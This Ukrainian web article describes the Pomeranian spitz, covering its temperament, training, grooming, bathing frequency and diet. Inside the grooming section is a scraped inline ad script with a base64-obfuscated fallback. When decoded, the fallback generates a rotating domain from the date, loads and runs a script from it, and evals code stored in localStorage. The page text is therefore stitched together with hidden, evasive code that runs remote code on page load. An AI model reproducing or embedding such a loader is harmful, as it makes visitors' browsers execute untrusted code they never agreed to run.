Особливості породи собак померанський шпіц

Померанський шпіц ‒ це невеликий собака, який відрізняється активною поведінкою, вірністю та люблячим характером. Ця порода чудово взаємодіє з дорослими та підлітками, але терпіти несвідому поведінку дітей вона зазвичай не бажає. Тому померанського шпіца потрібно заводити в той час, коли маленьких дітей у сім’ї немає та не передбачається.

Померанський шпіц ‒ чудовий сторожовий собака. Щойно він побачить чужинця на своїй території, то сильно загавкає, щоб попередити господаря. Цей улюбленець полюбляє довгі прогулянки та активність, тому не підійде для господарів, які не зможуть гаяти на нього кілька годин на день. Також шпіц досить впертий, тому його зухвалій поведінці не потрібно сприяти. Він буде сприймати це за слабкість.

Особливості характеру

Характер померанського шпіца ‒ це річ, до якої людина не може бути байдужою. Ти або любиш цього малого забіяку, або ні. На відміну від інших мініатюрних собак, померанський шпіц відрізняється розвиненим інтелектом. Саме тому його досить легко дресирувати. Однак впертий характер дуже часто стає перепоною на цьому шляху. Ставитися до тварини потрібно дуже делікатно й заохочувати до виконання команд різними смаколиками. Тільки тоді шпіц зрозуміє, що його дії та поведінка дійсно цінуються.

Особливості догляду

Догляд за померанським шпіцом стає складнішим через довгу руду шерсть ‒ головну окрасу цієї собаки. Догляд за шерстю передбачає своєчасне вичісування, цей процес має повторюватися кілька разів на тиждень. Линяння тварини відбувається двічі на рік.

Шпіца не потрібно часто купати, щоб не зник захисний бар’єр імунної системи, характерний для кожної собаки. Купання має відбуватися 1-2 рази на місяць. Водночас використовуйте спеціальні шампуні для довгої шерсті, щоб зробити її блискучою та гарною. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Цуценя шпіца потрібно піддавати дресируванню ще в досить маленькому віці. Якщо у вас немає достатнього досвіду, краще звернутися до кінолога, який допоможе сформувати слухняний характер тварини.

Що стосується харчування, то тут краще придбати спеціальні збалансовані корми для маленьких порід від Purina. Можна використовувати спеціальні варіанти для довгошерстих порід. Ні в якому разі не годуйте цуценятко солодощами, молоком, копченими продуктами, річною рибою тощо. Людська їжа також є забороненим продуктом, вона заважає здоровому формуванню організму улюбленця.

Померанський шпіц ‒ це чудовий компаньйон, який відрізняється інтелектом та впертістю. Якщо ви бажаєте більш ніжного та слухняного улюбленця, то краще звернути увагу на інші породи собак. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/osoblivosti-porodi-sobak-pomeranskij-shpits/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет

Добавить комментарий

scroll to top